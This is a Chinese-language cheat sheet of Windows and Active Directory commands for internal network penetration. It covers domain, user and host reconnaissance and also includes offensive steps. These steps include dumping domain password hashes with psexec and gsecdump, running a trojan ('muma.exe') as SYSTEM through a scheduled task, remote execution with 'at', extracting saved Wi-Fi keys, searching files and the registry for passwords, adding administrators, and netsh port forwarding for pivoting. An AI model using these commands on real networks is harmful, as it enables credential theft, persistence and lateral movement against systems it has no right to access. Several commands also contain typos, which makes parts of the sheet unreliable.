内网渗透常用命令
1.域常用操作命令
| whoami /all | 查看当前域并获取域SID(查看当前用户、权限) |
| wmic product get name,version | 查看安转的软件及版本信息 |
| net localgroup administrators | 查看本地管理员组(通常包含域用户) |
| net session | 列出本地计算机与所连接的客户端主机之间的会话 |
| wmic qfe get Caption,Description,HotFixID,InstalledOn | 查看补丁列表 |
| net share | 查看本机共享 |
| wmic share get name,path,status | 查看本机共享 |
| tasklist / svc | 查看本机进程 |
| wmic process | 查看本机进程 |
| wmic process list brief | 查看本机进程 |
| wmic process get processid,executablepath,name | 显示进程的路径、名称、pid |
| wmic service list brief | 查看本机服务 |
| wmic startuo get command,caption | 查看自启程序列表 |
| net statistics workstation | 查看主机开机时间 |
| schtasks /query /fo LIST /v | 查看计划任务 |
| net config workstation | 判断是否存在域,机器属于哪个域 |
| net view /domain | 查询有几个域, 查询域列表 |
| net time | 查看域 |
| net time /domian | 查询主域服务器的时间 |
| net group "domain controllers" /domain | 查看域控制器组 |
| nltest /DCLIST:0day | 查看域控制器主机名,0day为域名 |
| nltest /domain_trusts | 列出域信任关系 |
| net group /domain | 查看域内用户组列表 |
| net group "domain Admins" /domain | 查看域管理员组 |
| net group "Enterprise Admins" /domain | 查看企业系统管理员组 |
| net group "Domain Computers" /domain | 查看所有的域成员主机 |
| net group "Domain Controllers" /domain | 查看域控制器 |
| net accounts /domain | 获取域密码信息 |
| net user /domain | 查看域用户信息 |
| net user xxx /domain | 查看指定域用户详细信息 |
| wmic useraccount get /all | 获取域内用户详细信息(用户名、描述信息、SID、域名、状态) |
| net group qq_group /domain | 显示域中qq_group组的成员 |
| net view /domain:testdomain | 查看 testdomain域中的计算机列表 |
| net user domain-admin /domain | 查看管理员登陆时间,密码过期时间,是否有登陆脚本,组分配等信息 |
| echo %logonserver% | 查看登陆到这台服务器的计算机名 |
| net time \\192.168.1.1 | 查询远程共享主机192.168.1.1的时间 |
| net use \\IP\ipc$ password /user:username@domain | ipc$域内连接 |
| net view \\dc2.0day.org | 查看域控共享情况 |
| dir \\dc2.0day.org /s /a > sysvol.txt | 列出sysvol日志记录 |
| xcopy \\dc2.0day.org\sysvol.txt sysvol.txt /i /e /c | 远程拷贝到本地sysvol日志 |
| net user /domain bk bk123 | 修改域内用户密码,需要管理员权限 |
| net localgroup administartors 0day\zhangwei /add | 将0day域中的用户zhangwei添加到administrators组中 |
| mstsc /admin | 远程桌面登录到console会话解决hash无法抓出问题 |
| gpupdate/force | 更新域策略 |
| psexec \192.168.1.3 -u administrator -p bk1234 -c gsecdump.exe -u | 从域服务器密码存储文件windows/ntds/ntds.dit导出hash值出来 |
| gsecdump -a | 获取域登管理员登录过得hash值,这里gescdump为第三方导出AD域的hash值 |
| tasklist /S ip /U domain\username /P /V | 查看远程计算机进程列表 |
2.域常用操作命令
| ipconfig /all | 查看IP地址 |
| ipconfig /release | 释放地址 |
| ipconfig /renew | 重新获取Ip地址 |
| whoami | 查询账号所属权限 |
| whoami /all | 查看sid值 |
| systeminfo | 查询系统以及补丁信息 |
| tasklist /svc | 查看进程 |
| taskkill /im 进程名称(cmd) | 结束进程 |
| taskkill /pid | [进程码] -t(结束该进程) -f(强制结束该进程以及所有子进程) |
| wmic qfe get hotfixid | 查看已安装过得补丁,这个很实用 |
| wmic qfe list full /format:htable > hotfixes.htm | 详细的补丁安装 |
| wmic qfe | 查询补丁信息以及微软提供的下载地址 |
| ping hostname(主机名) | 显示该机器名的IP |
| net start | 查看当前运行的服务 |
| net user | 查看本地组的用户 |
| net localhroup administrators | 查看本机管理员组有哪些用户 |
| net user | 查看会话 |
| net session | 查看当前会话 |
| net share | 查看SMB指向的路径[即共享] |
| wmic share get name,path | 查看SMB指向的路径 |
| wmic nteventlog get path,filename,writeable | 查询系统日志文件存储位置 |
| net use \\IP\ipc$ password /user:username | 建立IPC会话(工作组模式) |
| net use z: \\192.168.1.1 | 建立映射到本机Z盘 |
| net time \\172.16.16.2 | 查询共享主机的是 |
| at \\172.16.16.2 13:50 c:\windows\2009.exe | 在共享主机上执行 |
| netstat -ano | 查看开放的端口 |
| netstat -an | find "3389" | 找到3389端口 |
| net accounts | 查看本地密码策略 |
| nbtstat –A ip | netbiso查询 |
| net view | 查看机器注释或许能得到当前活动状态的机器列表,如果禁用netbios就查看不出来 |
| echo %PROCESSOR_ARCHITECTURE% | 查看系统是32还是64位 |
| set | 查看系统环境设置变量 |
| net start | 查看当前运行的服务 |
| wmic service list brief | 查看进程服务 |
| wmic process list brief | 查看进程 |
| wmic startup list brief | 查看启动程序信息 |
| wmic product list brief | 查看安装程序和版本信息(漏洞利用线索) |
| wmic startup list full | 识别开机启动的程序 |
| wmic process where(description="mysqld.exe")>>mysql.log | 获取软件安装路径 |
| for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan showprofiles') do @echo %j | findstr-i -v echo | netsh wlan show profiles %jkey=clear | 一键获取wifi密码 |
| if defined PSModulePath (echo 支持powershell) else (echo 不支持powershell) | 查看是否支持posershell |
| qwinsta | 查看登录情况 |
| schtasks.exe /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "c:/muma.exe" /ED 2017/4/7 | 添加计划任务 |
| REG query HKCU /v "pwd" /s | 获取保存到注册表中的密码 |
提权补丁
| set KB2829361=MS13-046&set KB2830290=MS13-046&setKB2667440=MS12-020&set KB2667402=MS12-020&set KB3124280=MS16-016&setKB3077657=MS15-077&set KB3045171=MS15-051&setKB2592799=MS11-080&set KB952004=MS09-012 PR&set KB956572=MS09-012 巴西烤肉&set KB970483=MS09-020 iis6&set KB2124261=MS10-065 ii7&setKB2271195=MS10-065 ii7&systeminfo>a.txt&(for %i in (KB952004 KB956572KB2393802 KB2503665 KB2592799 KB2621440 KB2160329 KB970483 KB2124261 KB977165KB958644 KB2667402 KB2667440 KB2830290 KB2829361 KB3045171 KB3077657 KB3124280)do @type a.txt|@find /i "%i"||@echo %%i% Not Installed!)&del /f/q /a a.txt | windows未打补丁情况 |
|---|
3.内网网络结常用命令
| tracert IP | 路由跟踪 |
| route print | 打印路由表 |
| arp -a | 列出本网段内所有活跃的IP地址 |
| arp -s (ip + mac) | 绑定mac与ip地址 |
| arp -d (ip + mac) | 解绑mac与ip地址 |
| nbtscan -r 192.168.16.0/24 | 通过小工具nbtscan扫描整个网络 |
| netsh firewall show config | 查看防火墙策略 |
| netsh firewall show state | 查看防火墙策略 |
| for /l %i in (1,1,255) do @ping 10.0.0.%i -w 1 -n 1 | find /i "ttl" | 批量扫描内网存活主机 |
| windows自带端口转发: | |
|---|---|
| netsh interface ipv6 install | 首先安装IPV6(xp、2003下IPV6必须安装,否则端口转发不可用!) |
| netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=22connectaddress=1.1.1.1 connectport=22 | 将本机22到1.1.1.1的22 |
| netsh interface portproxy add v4tov4 listenaddress=192.168.193.1listenport=22 connectaddress=8.8.8.8 connectport=22 | |
| netsh interface portproxy add v4tov4 listenaddress=192.168.193.1listenport=22 connectaddress=www.baidu.com connectport=22 | |
| netsh interface portproxy show all | 查看转发配置 |
| netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0listenport=22 | 删除配置 |
| netsh firewall set portopening protocol=tcp port=22 name=Forwardmode=enable scope=all profile=all | 添加防火墙规则,允许连接22: |
4.敏感数据和目录
| dir /b/s config.* | 查看所在目录所有config.为前缀的文件 |
| findstr /si password *.xml *.ini *.txt | 查看后缀名文件中含有password关键字的文件 |
| findstr /si login *.xml *.ini *.txt | 查看后缀名文件中含有login关键字的文件 |
| copy con 创建命令: | |
| copy con ftp.bat | 创建ftp.bat批处理,然后输入ifconfig等命令,按ctr+z退出,并创建成功 |
| copy con test.vbs | 创建test.vbs脚本,输入脚本后,按ctr+z退出,并创建成功 |
5.dsquery的AD查询工具
| dsquery user domainroot -limit 65535 && net user /domain | 列出该域内所有用户名 |
| dsquery server -domain super.com | dsget server -dnsname -site | 搜索域内所有域控制器并显示他们的DNS主机名和站点名称 |
| dsquery contact | 寻找目录中的联系人 |
| dsquery subnet | 列出该域内网段划分 |
| query user | 查询那些用户在线 |
| dsquery group && net group /domain | 列出该域内分组 |
| dsquery ou | 列出该域内组织单位 |
| dsquery server && net time /domain | 列出该域内域控制器 |
| dsquery site -o rdn | 搜索域中所有站点的名称 |
| dsquery group dc=super,dc=com |more | 搜索在DC=SUPER,DC=COM 域中的所有组 |
| psloggedon.exe | 查询那台主机和用户登录到该主机上 |
| netsess.exe //192.168.1.115 | 远程主机上无需管理员权限,查询到主机名和用户 |
| reg query "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\TERMINAL SERVERCLIENT\DEFAULT" | 获取最近mstsc登录的记录 |
参考
本作品采用 知识共享署名 -非商业性使用 -相同方式共享 4.0 国际许可协议 进行许可。